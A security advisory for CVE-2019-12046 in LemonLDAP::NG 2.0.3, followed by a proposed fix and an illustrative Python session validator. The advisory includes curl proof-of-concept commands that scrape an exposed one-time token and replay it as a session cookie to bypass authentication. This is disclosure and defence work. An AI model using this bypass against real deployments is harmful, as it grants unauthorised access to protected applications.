[Security: high, CVE-2019-12046] Setting tokenUseGlobalStorage allows unauthenticated users to access the portal (and applications without rules)
References
Concerned version
Version: 2.0.3
Summary
Any token stored in the "main" session database may be used as a valid session identifier to browse the portal and access applications with a bogus (all fields are empty) but nonetheless accepted session.
This is an issue if tokens generated by OneTimeToken.pm are stored in the main session database, because these tokens are directly visible to unauthenticated users.
Proof of concept:
First, enable tokenUseGlobalStorage in the manager, then:
$ curl -s http://auth.example.com/ | grep token
<input type="hidden" name="token" value="5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862" />
$ curl -sb lemonldap=5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 http://auth.example.com/ | grep Connected
<span trspan="connectedAs">Connected as</span>
$ curl -sb lemonldap=5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 http://test1.lemonregister.lxd/ | grep title
<title>LemonLDAP::NG sample protected application</title>
We are logged onto the portal with an empty username, but that's enough to browse the application list, and access applications that have no access rules (or rules that behave badly in the presence of an empty string!)
Logs
LLNG[19019]: Get session 5e57a93005d3877cccafc6da806c2911fdb62ff2af60d9bb2b890b4253f2a862 from Handler::Main::Run
May 10 13:36:08 lemonregister LLNG[19019]: Check session validity from Handler
May 10 13:36:08 lemonregister LLNG[19019]: Session timeout -> 72000
In the global storage, tokens look like this:
{
"_session_kind" : "SSO",
"tokenSessionStartTimestamp" : 1557495341,
"_utime" : 1557423461,
"_type" : "token",
"tokenTimeoutTimestamp" : 1557495461,
"_session_id" : "9333f50d80fdbf77d584af01dba27a2dc72b94f841c44dd30d0b9ed42af589df"
}
That "_session_kind" : "SSO" is probably the root of the issue, as it does not appear when tokens are used with the normal configuration (tokenUseGlobalStorage=0).
Possible fixes
The handler and portal should probably check the _session_kind of the session it retrieves before accepting it.
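To make the proposed check concrete, here is an added illustration of the validation a handler or portal could apply to a record fetched from session storage before treating it as an authenticated session. This is example code written for this report, not LemonLDAP::NG's own implementation. It checks the _session_kind and _type keys that appear in the token record quoted above, and additionally requires a non-empty _user field; the _user key and the "authenticated session" record are assumptions for the example, not data from the report.

```python
"""Illustrative session-record validation (not LemonLDAP::NG code).

The point of the report is that a record in the global storage with
"_session_kind": "SSO" is accepted as a session even though it is a
one-time token with no user in it.  The validator below refuses such
records on three independent grounds, so that a token mislabelled as
"SSO" is still rejected.
"""
from typing import Any, Mapping, Optional, Tuple

# Constructed copy of the token record quoted in the report.
TOKEN_RECORD = {
    "_session_kind": "SSO",
    "tokenSessionStartTimestamp": 1557495341,
    "_utime": 1557423461,
    "_type": "token",
    "tokenTimeoutTimestamp": 1557495461,
    "_session_id": "9333f50d80fdbf77d584af01dba27a2dc72b94f841c44dd30d0b9ed42af589df",
}

# Constructed example of a real authenticated SSO session.  The "_user"
# key is an assumption made for this example.
SSO_RECORD = {
    "_session_kind": "SSO",
    "_utime": 1557423461,
    "_type": None,
    "_user": "dwho",
    "_session_id": "0000000000000000000000000000000000000000000000000000000000000001",
}

# Constructed in-memory stand-in for the "main" session database,
# keyed by the value carried in the lemonldap cookie.
GLOBAL_STORAGE = {
    TOKEN_RECORD["_session_id"]: TOKEN_RECORD,
    SSO_RECORD["_session_id"]: SSO_RECORD,
}


def validate_session(record: Optional[Mapping[str, Any]]) -> Optional[str]:
    """Return None if the record is an authenticated SSO session,
    otherwise a short reason for rejecting it."""
    if record is None:
        return "unknown session id"
    # 1. Only records explicitly flagged as SSO sessions may be used.
    if record.get("_session_kind") != "SSO":
        return "wrong session kind: %r" % (record.get("_session_kind"),)
    # 2. One-time tokens carry "_type": "token"; reject them even when
    #    they were (wrongly) stored with _session_kind "SSO".
    if record.get("_type") == "token":
        return "record is a token, not a session"
    # 3. An authenticated session must identify a user; an empty or
    #    missing user is exactly the "bogus but accepted" session.
    if not record.get("_user"):
        return "no authenticated user in session"
    return None


def resolve_session(storage: Mapping[str, Mapping[str, Any]],
                    cookie_value: str) -> Tuple[Optional[Mapping[str, Any]], Optional[str]]:
    """Look a cookie value up in storage and validate the result.

    Returns (record, None) when the session is acceptable, and
    (None, reason) when the handler should treat the request as
    unauthenticated."""
    record = storage.get(cookie_value)
    reason = validate_session(record)
    if reason is not None:
        return None, reason
    return record, None


if __name__ == "__main__":
    for sid in list(GLOBAL_STORAGE) + ["not-a-session"]:
        record, reason = resolve_session(GLOBAL_STORAGE, sid)
        status = "accepted for %s" % record["_user"] if record else "rejected: " + reason
        print("%s... %s" % (sid[:12], status))
```

Run stand-alone, the script shows the token id from the report being rejected as a token while the constructed SSO session is accepted; the ordering of the checks matters only for the reason string, since any single failing check is enough to refuse the session.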